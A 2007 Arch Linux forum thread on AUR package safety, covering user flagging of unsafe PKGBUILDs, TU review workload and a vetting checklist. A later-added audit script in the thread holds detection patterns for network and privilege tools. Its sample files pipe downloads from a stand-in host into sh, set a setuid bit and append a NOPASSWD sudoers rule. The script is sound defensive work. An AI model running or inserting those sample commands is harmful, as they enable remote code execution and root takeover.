One big hindrance for people coming to Arch is the availability of packages. Not everyone knows how and/or wants to build packages themselves. Moreover, installing packages with pacman or aurbuild has many advantages over building them. Many packages are available in AUR and a lot of them are not marked safe, which puts newbies like me (who cannot make sense of PKGBUILDs) in a dilemma over whether to install them or not. TUs are quite busy marking packages as safe. But it's not possible to do this for all the packages. An alternative way might be to have an option like "vote" and "out of date" to mark packages "unsafe", so that users (NOT TUs) who look at the PKGBUILD and find something unusual can mark those packages unsafe, and TUs can look into those packages on a priority basis, remove the packages and ban the maintainer. In this way, we will be removing unsafe packages and banning the sinners and hence making the whole AUR safer and safer.
Err, what is your point? Stating what is already done? I don't know if you can flag something as unsafe, but other than that, it seems like everything you mentioned is implemented?
Also, PKGBUILDs are extremely easy things to understand. Perhaps the wiki needs to be clearer?
That's the point: the ability to flag things "unsafe." Whatever else I mentioned is already there. I was just trying to make it clear that just as we have the "vote" thing, we can have something like "unsafe".
Also, you are right on the wiki issue.
One big hindrance for people coming to Arch is the availability of packages. Not everyone knows how and/or wants to build packages themselves. Moreover, installing packages with pacman or aurbuild has many advantages over building them.
Arch has many thousands of packages between ABS, current, extra and community, let alone AUR. Have you activated 'extra' and 'community' in your pacman.conf?
ABS is very easy to use: simply run abs as root, make /var/abs/local, and copy the contents of your specific choice from its folder under /var/abs/ to /var/abs/local. Then just run makepkg and install the result with pacman -U name_of_pkg.tar.gz
Some packages in AUR are already in community, and are installable through pacman. Make sure you run pacman -Ss name_of_pkg to see if it is available in the repos before looking elsewhere.
That's the point: the ability to flag things "unsafe." Whatever else I mentioned is already there. I was just trying to make it clear that just as we have the "vote" thing, we can have something like "unsafe".
Also, you are right on the wiki issue.
You mean so any user can flag a package as unsafe if they find a malicious PKGBUILD? I think that's a pretty good idea too.
Have it say "10 users have flagged this package as malicious" or "10 users have flagged this package as safe", or something similar. aurbuild could use this info and let you know?
That would be helpful for all the packages the TUs haven't checked, but I think it's assumed you will look over the PKGBUILD before you use it.
ABS is very easy to use: simply run abs as root, make /var/abs/local, and copy the contents of your specific choice from its folder under /var/abs/ to /var/abs/local. Then just run makepkg and install the result with pacman -U name_of_pkg.tar.gz
If there is malicious code in the PKGBUILD, then would doing the above mean that I'm safe? Sorry if that is a stupid question, but to the best of my knowledge, if there is something evil in the PKGBUILD, then doing the above would also mean that I'm putting my system in danger. Isn't it so?
You mean so any user can flag a package as unsafe if they find a malicious PKGBUILD? I think that's a pretty good idea too.
Have it say "10 users have flagged this package as malicious" or "10 users have flagged this package as safe", or something similar. aurbuild could use this info and let you know?
That would be helpful for all the packages the TUs haven't checked, but I think it's assumed you will look over the PKGBUILD before you use it.
That's something like what I meant.
but I think it's assumed you will look over the PKGBUILD before you use it.
Not everyone has sound technical knowledge (at least not me) and can glean the meaning of a PKGBUILD, and for that reason only you have the "safe" flag out there.
If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.
A report function for PKGBUILDs? Perhaps. A "this-package-could-hurt-your-system" vote function? Utterly pointless.
If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.
A report function for PKGBUILDs? Perhaps. A "this-package-could-hurt-your-system" vote function? Utterly pointless.
Also what I was thinking.
pacman roulette : pacman -S $(pacman -Slq | LANG=C sort -R | head -n $((RANDOM % 10)))
If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.
A report function for PKGBUILDs? Perhaps. A "this-package-could-hurt-your-system" vote function? Utterly pointless.
I agree with you too. In fact, that is what I initially thought. See my initial post where I mention that a TU can look into the PKGBUILD on a priority basis when reported.
If a PKGBUILD had malicious code in it it would be deleted immediately. The idea that a package with malicious code in it could stand through ten people seeing and voting that it's bad without telling a TU is ridiculous.
Maybe the wording on the AUR should be changed then. I know I associate "safety" with its opposite: danger. If a package is not marked as safe, I usually wonder if there is something about it that may somehow compromise my computer (even though I understand PKGBUILDs).
Perhaps the wording could be changed to "This package conforms to Arch Linux packaging standards". I think that would be clearer for many people.
Last edited by Jessehk (2007-08-20 14:51:47)
Misfit138 wrote: ABS is very easy to use: simply run abs as root, make /var/abs/local, and copy the contents of your specific choice from its folder under /var/abs/ to /var/abs/local. Then just run makepkg and install the result with pacman -U name_of_pkg.tar.gz
If there is malicious code in the PKGBUILD, then would doing the above mean that I'm safe? Sorry if that is a stupid question, but to the best of my knowledge, if there is something evil in the PKGBUILD, then doing the above would also mean that I'm putting my system in danger. Isn't it so?
Note that the ABS command pulls PKGBUILD files from the Arch CVS (i.e. current/extra/unstable and maybe community, I'm not sure). Those PKGBUILDs are maintained by devs and TUs - if you don't trust them, who can you trust?
One big hindrance for people coming to Arch is the availability of packages.
I hear this occasionally, and I wonder what packages people are talking about? Just curious.
Between AUR and the repos I rarely have to build my own packages. When I do, it's usually so I can regularly build bleeding edge apps out of some version control system.
Also, using yaourt, building out of AUR is as easy as getting binaries from the repos.
Last edited by veek (2007-08-20 15:59:41)
Most of the apps which are not marked safe are in unsupported which is not a part of abs.
I hear this occasionally, and I wonder what packages people are talking about? Just curious.
Between AUR and the repos I rarely have to build my own packages. When I do, it's usually so I can regularly build bleeding edge apps out of some version control system. Also, using yaourt, building out of AUR is as easy as getting binaries from the repos.
That's the issue. One needs AUR too along with the repos, and many packages in unsupported are not marked safe. We are talking about those packages. For example, two good firewall apps, firehol and arno's, are in AUR and are not marked safe. yaourt too is not marked safe. If one does not understand the PKGBUILD, then how is s/he going to make sure that there is nothing wrong being installed?
By learning, silly! Arch is no hand-holding distribution and the same goes for the AUR. You have to act responsibly when you use packages from the AUR. There is no sense in dumbing things down for people that are, let's say, too lazy to get a grip on PKGBUILDs. If you want something in community you can still ask a TU to give a PKGBUILD a look. Either way, to keep the AUR simple (Arch philosophy, you know) the users have to learn.
That being said: go wizzomafizzo!
Todays mistakes are tomorrows catastrophes.
Well, hands down. We're working on marking packages safe (I'm not currently, for personal reasons; I just keep packages up to date).
Some time ago, I took up the work of marking every package safe which appears in the recent update list, by reviewing them, marking them and flagging them. I found myself spending 60h+ a week on this task, and didn't get along with any of my development tasks.
Even so, note that packages are unsafe again if they're updated, since we can't know what code the update brought (often I flagged a package 4 times within 5 minutes, since the author forgot the contributor tag, added a comment, forgot to raise the pkgver etc.).
Also, when I was looking over the packages, I had about 10-20% of the packages which I could flag safe. That's a ridiculously small number; most of them were missing dependencies, did compile fine, but had a wrong install method, installing directly into / instead of $startdir/pkg, and similar.
The quality of AUR packages in general isn't very high, sad but true. I don't think users intend to damage anything or are intentionally making packages which won't work out. It comes from missing knowledge, combined with the will to help others. I know a lot of TUs are working very hard on flagging packages, and currently they're doing a good job in their spare time.
I think the best way of using AUR is, to learn how compiling linux software works, and what could cause troubles.
To check:
- Is the download from the original download source / an official mirror
- Does the PKGBUILD include any patches which are not in the bug tracker and marked for the next version and / or confirmed problems (adding the bug# to the PKGBUILD for the patch will help us)?
- Never run makepkg as root
- namcap the packages before installing them
- Check the seds / cats / greps for injections into the code (if the PKGBUILD includes any)
- If you're curious, try to find somebody helping you on IRC, who has a better knowledge about compiling software, so he knows why something in a PKGBUILD is needed which you don't understand.
Yours,
STiAT
Ability is nothing without opportunity.
That's the major problem with AUR: there are plenty of really bad PKGBUILDs. It is pretty much required that you know how a PKGBUILD works, and the proper guidelines for them, if you use AUR.
To check:
- Is the download from the original download source / an official mirror
- Does the PKGBUILD include any patches which are not in the bug tracker and marked for the next version and / or confirmed problems (adding the bug# to the PKGBUILD for the patch will help us)?
- Never run makepkg as root
- namcap the packages before installing them
- Check the seds / cats / greps for injections into the code (if the PKGBUILD includes any)
- If you're curious, try to find somebody helping you on IRC, who has a better knowledge about compiling software, so he knows why something in a PKGBUILD is needed which you don't understand.
Yours,
STiAT
Also check the .install file, as it's a script which is run as root.
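As an added example, not from this thread or from any Arch tool: a small POSIX shell script that mechanises STiAT's checklist above (source host, local patches, writes outside $startdir/pkg, fetch or exec tricks inside build(), sed/cat/grep edits) together with the reply's point that the .install hooks run as root. The grep patterns are heuristics of my own, the sample PKGBUILD and .install files are constructed, and the `$pkgdir` name is assumed from later makepkg releases; the script only points a reader at the lines worth reading before makepkg and namcap, it never declares a package safe.

```shell
#!/bin/sh
# Added example (not from the thread): a pre-makepkg audit that mechanises the checklist.
# It prints "[!] ..." for suspicious lines and "[?] ..." for lines that merely need reading.
# All patterns, paths and sample files are constructed assumptions, not Arch tooling.

url_host() { printf '%s\n' "$1" | sed -n 's#^[a-z]*://\([^/]*\).*#\1#p'; }  # host of scheme://host/...
unquote()  { tr -d "\"'()"; }                                                 # drop shell quoting noise

# Entries of source=( ... ), one per line. No variable expansion: literal URLs are assumed.
list_sources() {
    awk '/^source=\(/ {on=1} on {print} on && /\)/ {on=0}' "$1" \
        | sed 's/^source=//' | unquote | tr ' \t' '\n\n' | grep -v '^$'
}

audit_pkgbuild() {
    f="$1"
    upstream=$(url_host "$(grep '^url=' "$f" | head -n1 | cut -d= -f2- | unquote)")
    # 1. Fetched sources should live on the upstream host from url=; local patches need a bug reference.
    list_sources "$f" | while read -r src; do
        host=$(url_host "$src")
        if [ -n "$host" ]; then
            if [ -n "$upstream" ] && [ "$host" != "$upstream" ]; then
                echo "[!] source $src is not on the upstream host ($upstream)"
            fi
        else
            case "$src" in *.patch|*.diff) echo "[?] local patch $src: match it to a bug tracker entry" ;; esac
        fi
    done
    # 2. Anything written outside $startdir/pkg (later makepkg: $pkgdir) lands on the build host.
    grep -nE 'make[[:space:]].*install' "$f" | grep -vE 'DESTDIR=|\$startdir/pkg|\$pkgdir' \
        | sed 's/^/[!] make install without DESTDIR at /'
    grep -nE '^[[:space:]]*(install|cp|mkdir|ln|rm)[[:space:]].*[[:space:]]/(usr|etc|opt|var|bin|sbin|lib)(/|[[:space:]]|$)' "$f" \
        | grep -vE '\$startdir/pkg|\$pkgdir' | sed 's/^/[!] live system path touched at /'
    # 3. makepkg fetches sources itself; downloads, pipes into a shell, eval and encoded blobs in build() smuggle code in.
    grep -nE '(^|[^[:alnum:]_])(curl|wget|eval|nc)([^[:alnum:]_]|$)|\|[[:space:]]*(ba)?sh([^[:alnum:]_]|$)|base64|/dev/tcp' "$f" \
        | sed 's/^/[!] fetch or exec during build at /'
    # 4. sed/cat/grep edits of the unpacked source are where injections hide: read each one.
    grep -nE '^[[:space:]]*(sed|cat|grep)[[:space:]]|[|>][[:space:]]*(sed|cat|grep)' "$f" \
        | sed 's/^/[?] source edit at /'
}

# The .install hooks run as root on every machine that installs the package.
audit_install() {
    grep -nE '(^|[^[:alnum:]_])(curl|wget|eval|nc)([^[:alnum:]_]|$)|rm[[:space:]]+-[a-zA-Z]*[rR]|base64|/dev/tcp|chmod[[:space:]].*([ug]\+s|[0-7]?[2-7][0-7]{3})|/etc/(passwd|shadow|sudoers)|>>?[[:space:]]*/(root|etc|home)/|authorized_keys|crontab' "$1" \
        | sed 's/^/[!] root-time hook at /'
}

# Number of "[!]" findings; a non-zero count means "read before you build", not "malicious".
pkgbuild_flags() { audit_pkgbuild "$1" | grep -c '^\[!\]' || true; }
install_flags()  { audit_install "$1"  | grep -c '^\[!\]' || true; }

# Constructed samples: one PKGBUILD that breaks every rule, its .install, and a clean one.
write_samples() {
    mkdir -p "$1/bad" "$1/clean"
    cat > "$1/bad/PKGBUILD" <<'EOF'
# Contributor: Someone <someone@example.org>
pkgname=foo
pkgver=1.0
url="http://example.org/foo"
source=(http://example.org/foo-$pkgver.tar.gz http://members.example.net/~x/foo-extra.tar.gz local.patch)
build() {
  cd $startdir/src/foo-$pkgver
  patch -p1 < ../local.patch
  sed -i 's/^PREFIX=.*/PREFIX=\/usr/' Makefile
  wget -q http://members.example.net/~x/helper.sh -O - | sh
  make || return 1
  make install
  install -D -m755 foo.sh /usr/bin/foo-helper
}
EOF
    cat > "$1/bad/foo.install" <<'EOF'
post_install() {
  curl -s http://members.example.net/~x/post.sh | sh
  chmod u+s /usr/bin/foo-helper
  echo "foo ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
}
op=$1; shift; $op "$@"
EOF
    cat > "$1/clean/PKGBUILD" <<'EOF'
# Contributor: Someone <someone@example.org>
pkgname=bar
pkgver=2.1
url="http://example.org/bar"
source=(http://example.org/bar-$pkgver.tar.gz)
build() {
  cd $startdir/src/bar-$pkgver
  ./configure --prefix=/usr
  make || return 1
  make DESTDIR=$startdir/pkg install
}
EOF
}

# Stand-alone demo on the constructed samples (bad: 4 findings, clean: 0, .install: 3).
demo=$(mktemp -d)
write_samples "$demo"
for p in bad clean; do
    echo "== $p/PKGBUILD: $(pkgbuild_flags "$demo/$p/PKGBUILD") suspicious lines"
    audit_pkgbuild "$demo/$p/PKGBUILD"
done
echo "== bad/foo.install: $(install_flags "$demo/bad/foo.install") suspicious lines"
audit_install "$demo/bad/foo.install"
rm -r "$demo"
```

Run it against an unpacked AUR tarball with `audit_pkgbuild PKGBUILD; audit_install *.install` before makepkg. The source-host check is the one worth keeping even if you drop the rest: makepkg will fetch whatever source=() names, and a second tarball from someone's personal webspace is the cheapest way to slip unreviewed code past a reader who only glances at the upstream URL. Still run namcap on the built package and, as the thread says, never build as root.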
Some time ago, I took up the work of marking every package safe which appears in the recent update list, by reviewing them, marking them and flagging them. I found myself spending 60h+ a week on this task, and didn't get along with any of my development tasks.
Even so, note that packages are unsafe again if they're updated, since we can't know what code the update brought (often I flagged a package 4 times within 5 minutes, since the author forgot the contributor tag, added a comment, forgot to raise the pkgver etc.).
I guess that's where a flagging system will help.
Also, when I was looking over the packages, I had about 10-20% of the packages which I could flag safe. That's a ridiculously small number; most of them were missing dependencies, did compile fine, but had a wrong install method, installing directly into / instead of $startdir/pkg, and similar.
The quality of AUR packages in general isn't very high, sad but true. I don't think users intend to damage anything or are intentionally making packages which won't work out. It comes from missing knowledge, combined with the will to help others. I know a lot of TUs are working very hard on flagging packages, and currently they're doing a good job in their spare time.
Few guidelines about the arch standards and simple do's and dont's in wiki might help enhance the quality of packages in AUR.
I think the best way of using AUR is, to learn how compiling linux software works, and what could cause troubles.
To check:
- Is the download from the original download source / an official mirror
- Does the PKGBUILD include any patches which are not in the bug tracker and marked for the next version and / or confirmed problems (adding the bug# to the PKGBUILD for the patch will help us)?
- Never run makepkg as root
- namcap the packages before installing them
- Check the seds / cats / greps for injections into the code (if the PKGBUILD includes any)
- If you're curious, try to find somebody helping you on IRC, who has a better knowledge about compiling software, so he knows why something in a PKGBUILD is needed which you don't understand.
Though most of the above went over my head,
I am trying to make sense of it bit by bit.
I usually run "aurbuild -saem package" to install some package. You mean to say that I should not install, but just create the package with "aurbuild -saemx", then run namcap, and then install using "pacman -A"?